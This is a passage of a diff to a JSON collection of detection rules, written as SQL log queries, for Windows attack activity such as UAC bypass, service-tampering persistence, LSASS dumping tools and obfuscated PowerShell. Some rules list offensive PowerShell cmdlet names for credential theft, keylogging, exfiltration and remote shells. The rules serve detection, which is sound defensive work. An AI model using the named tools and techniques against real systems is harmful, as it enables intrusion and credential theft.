\"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" + "filename": "proc_creation_win_msiexec_execute_dll.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", - "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_pm_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "Potential Persistence Attempt Via Existing Service Tampering", + "id": "38879043-7e1e-47a9-8d46-6bec88e201df", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", + "author": "Sreeman", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" + }, + { + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", + "status": "experimental", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.discovery", "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "title": "Use of Forfiles For Execution", + "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use via a batch script or by an administrator." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_lolbin_forfiles.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Automated Collection Command Prompt", + "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_susp_automated_collection.yml" }, { - "title": "Suspicious PowerShell Download - PoshModule", - "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "title": "Perl Inline Command Execution", + "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_download.yml" + "filename": "proc_creation_win_perl_inline_command_execution.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", + "status": "test", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload 